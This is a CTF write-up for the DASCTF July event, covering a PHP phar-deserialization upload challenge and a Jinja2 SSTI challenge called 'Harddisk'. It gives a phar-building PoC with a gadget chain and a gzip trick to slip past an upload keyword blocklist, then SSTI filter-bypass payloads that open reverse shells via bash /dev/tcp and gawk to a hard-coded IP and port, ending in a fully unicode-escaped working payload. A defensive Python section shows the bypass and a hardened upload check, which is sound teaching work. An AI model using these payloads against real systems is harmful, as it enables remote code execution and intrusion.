DASCTF July Enablement Challenge (DASCTF七月赋能赛)

WEB

1.Ez to getflag

The image viewer has an arbitrary file read, which lets us retrieve the source of upload.php, class.php and index.php.

The upload endpoint scans the file content with this blocklist:

$filter = '/<\?php|php|exec|passthru|popen|proc_open|shell_exec|system|phpinfo|assert|chroot|getcwd|scandir|delete|rmdir|rename|chgrp|chmod|chown|copy|mkdir|file|file_get_contents|fputs|fwrite|dir/i';

The file-read endpoint filters '/http|https|file:|php:|gopher|dict|\.\./i'; the phar: wrapper is not on the list.

class.php contains the dangerous call include($door). Handing it a phar:// path makes PHP parse the uploaded archive's manifest and unserialize its metadata, so an upload we control gives us phar deserialization. The gadget chain through the application's classes is:

Test::__destruct => Upload::__toString => Show::__get => Show::__call => backdoor()

PoC (run it with php -d phar.readonly=0 poc.php, otherwise writing the phar throws):

<?php
// Builds poc.phar with the gadget chain stored as phar metadata.
// Requires phar.readonly=0: php -d phar.readonly=0 poc.php
class Test{
    public $str;
}
class Upload {
    public $f;
    public $fname;
    public $fsize;
    function __construct(){
        $this->fname=new Show;
        $this->fsize='phpinfo'; // change to /flag to read the flag
    }
}
class Show{
    public $source;
}
$a=new Test;
$a->str=new Upload();
echo serialize($a);
$phar = new Phar("poc.phar"); // the extension must be .phar when creating the archive
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); // set the stub; every phar needs __HALT_COMPILER()
$phar->setMetadata($a); // store our object graph as meta-data in the manifest
$phar->addFromString("test.txt", "test"); // add a file so the archive is non-empty
// the signature is computed automatically
$phar->stopBuffering();

?>

Once the phar exists, gzip it to get past the content check: the compressed bytes no longer contain <?php, phpinfo or any other blocklisted word, while PHP's phar wrapper still opens whole-archive gzip-compressed phars transparently, so the metadata is still unserialized when the file is accessed.

import gzip

with open('poc.phar', 'rb') as file:
    f = file.read()

newf = gzip.compress(f)  # gzip-compress the whole phar; phar:// inflates it transparently
with open('poc.png', 'wb') as file:  # write it out under an image extension for the upload
    file.write(newf)
After upload the server stores the file under a hashed name, e.g. poc.png ---> 23f1a0f70f076b42b5b49f24ee28f696, and the chain fires when that file is opened through the phar:// wrapper (the .png extension does not matter to the wrapper, and phar: is not in the read filter):

/file.php?f=phar://upload/23f1a0f70f076b42b5b49f24ee28f696.png&_=1713073174353
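Why the gzip step works, and what a defender should do instead, as an added example (it is not code from the writeup or from the challenge): it applies the upload blocklist quoted above to a constructed stand-in for the phar bytes, shows that the same bytes pass once gzip-compressed, and then shows a hardened check that inflates gzip input under a size cap and rejects anything carrying the __HALT_COMPILER marker every phar stub must contain. FAKE_PHAR is a constructed byte string, not a real archive, and MAX_DECOMPRESSED is an arbitrary cap chosen here.

```python
import re
import zlib
import gzip

# Constructed stand-in for the uploaded archive. Real phar bytes come from
# the PHP script above; for the keyword filter only the stub matters, and
# every phar stub ends in __HALT_COMPILER();
PHAR_STUB = b"<?php __HALT_COMPILER(); ?>\r\n"
FAKE_PHAR = PHAR_STUB + b'O:4:"Test":1:{s:3:"str";N;}' + b"test.txt\x00test"

# The upload filter quoted in the writeup, translated from PCRE to Python.
UPLOAD_FILTER = re.compile(
    rb"<\?php|php|exec|passthru|popen|proc_open|shell_exec|system|phpinfo|"
    rb"assert|chroot|getcwd|scandir|delete|rmdir|rename|chgrp|chmod|chown|"
    rb"copy|mkdir|file|file_get_contents|fputs|fwrite|dir",
    re.IGNORECASE,
)

GZIP_MAGIC = b"\x1f\x8b"
MAX_DECOMPRESSED = 1 << 20  # arbitrary 1 MiB cap so a gzip bomb cannot exhaust memory


def naive_check(data: bytes) -> bool:
    """The challenge's check: scan the raw upload bytes for banned words."""
    return UPLOAD_FILTER.search(data) is not None


def gzip_wrap(data: bytes) -> bytes:
    """The writeup's gzip step (mtime=0 keeps the output deterministic)."""
    return gzip.compress(data, mtime=0)


def gunzip_bounded(data: bytes, limit: int) -> bytes:
    """Inflate a gzip stream, refusing output longer than `limit` bytes."""
    d = zlib.decompressobj(16 + zlib.MAX_WBITS)  # 16+ selects gzip framing
    out = d.decompress(data, limit + 1)          # ask for one byte past the cap
    if len(out) > limit:
        raise ValueError("decompressed size exceeds limit")
    return out


def hardened_check(data: bytes) -> bool:
    """Reject if the bytes, or what PHP's phar wrapper would see after
    transparently inflating them, look like a phar or match the blocklist."""
    if data.startswith(GZIP_MAGIC):
        try:
            data = gunzip_bounded(data, MAX_DECOMPRESSED)
        except (zlib.error, ValueError):
            return True  # unreadable or oversized gzip: reject rather than guess
    if re.search(rb"__HALT_COMPILER", data, re.IGNORECASE):
        return True  # every phar stub carries this marker
    return UPLOAD_FILTER.search(data) is not None


if __name__ == "__main__":
    wrapped = gzip_wrap(FAKE_PHAR)
    print("raw phar blocked by naive check:    ", naive_check(FAKE_PHAR))
    print("gzipped phar blocked by naive check:", naive_check(wrapped))
    print("gzipped phar blocked by hardened:   ", hardened_check(wrapped))
```

The raw regex is the wrong layer: PHP's phar wrapper opens whole-archive gzip-compressed phars transparently, so what the upload filter scans is not what phar:// later parses. Checking the magic bytes, inflating with a bound, and rejecting anything that contains __HALT_COMPILER closes this route; where the application never needs phar:// at all, stream_wrapper_unregister('phar') removes the wrapper entirely.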

Harddisk

SSTI

The following are filtered:

{{   _   .   [   print   (space)   `
The {{ filter is bypassed by doing all the work inside a {% set %} tag. Because print is banned there is no way to get output back into the page, so the challenge comes down to a reverse shell: the expression is evaluated through {% set %} and referenced from {% if %}...{% endif %}, which produces no echo. For the banned characters inside the payload (_ and . in particular), testing shows that \uXXXX escapes inside string literals get through: Jinja2's lexer decodes double-quoted literals with the unicode-escape codec, so attr("\u005f\u005fglobals\u005f\u005f") is attr("__globals__") by the time it is evaluated. Note that __builtins__ taken from lipsum's globals is a dict, so eval has to be fetched with __getitem__ rather than attr. The unencoded payload is:

{%set c=lipsum|attr("__globals__")|attr("__getitem__")("__builtins__")|attr("__getitem__")("eval")("__import__('os')")|attr("popen")("bash -c 'bash -i >& /dev/tcp/47.237.137.220/7777 0>&1'")|attr("read")()%}{%if c%}1{%endif%}

The spaces inside the tags can be replaced with %09 (a tab), which Jinja2 accepts as whitespace.

A bash reverse shell may not connect (no bash on the target, or /dev/tcp unavailable); a gawk reverse shell over the /inet/tcp special file is an alternative:

awk 'BEGIN {s = "/inet/tcp/0/47.237.137.220/7777"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
Wrapped into the template (the command is URL-encoded because it travels as a request parameter; the . characters in the address and the _ in the dunder names are still caught by the filter, so for the real request they have to be \u-escaped the same way as in the final payload):

{%set poc="awk%20'BEGIN%20%7Bs%20%3D%20%5C%22%2Finet%2Ftcp%2F0%2F47.237.137.220%2F7777%5C%22%3B%20while(42)%20%7B%20do%7B%20printf%20%5C%22shell%3E%5C%22%20%7C%26%20s%3B%20s%20%7C%26%20getline%20c%3B%20if(c)%7B%20while%20((c%20%7C%26%20getline)%20%3E%200)%20print%20%5C%240%20%7C%26%20s%3B%20close(c)%3B%20%7D%20%7D%20while(c%20!%3D%20%5C%22exit%5C%22)%20close(s)%3B%20%7D%7D'%20%2Fdev%2Fnull"%}{%set c=lipsum|attr("__globals__")|attr("__getitem__")("__builtins__")|attr("__getitem__")("eval")("__import__('os')")|attr("popen")(poc)|attr("read")()%}{%if c%}1{%endif%}

Final payload: every string literal is \uXXXX-escaped so no literal _ or . remains, eval is fetched from the builtins dict with __getitem__, and the spaces inside the tags are sent as %09:

{%set%09c=lipsum|attr("\u005f\u005f\u0067\u006c\u006f\u0062\u0061\u006c\u0073\u005f\u005f")|attr("\u005f\u005f\u0067\u0065\u0074\u0069\u0074\u0065\u006d\u005f\u005f")("\u005f\u005f\u0062\u0075\u0069\u006c\u0074\u0069\u006e\u0073\u005f\u005f")|attr("\u005f\u005f\u0067\u0065\u0074\u0069\u0074\u0065\u006d\u005f\u005f")("eval")("\u005f\u005f\u0069\u006d\u0070\u006f\u0072\u0074\u005f\u005f\u0028\u0027\u006f\u0073\u0027\u0029")|attr("\u0070\u006f\u0070\u0065\u006e")("\u0062\u0061\u0073\u0068\u0020\u002d\u0063\u0020\u0027\u0062\u0061\u0073\u0068\u0020\u002d\u0069\u0020\u003e\u0026\u0020\u002f\u0064\u0065\u0076\u002f\u0074\u0063\u0070\u002f\u0034\u0037\u002e\u0032\u0033\u0037\u002e\u0031\u0033\u0037\u002e\u0032\u0032\u0030\u002f\u0037\u0037\u0037\u0037\u0020\u0030\u003e\u0026\u0031\u0027")|attr("\u0072\u0065\u0061\u0064")()%}{%if%09c%}1{%endif%}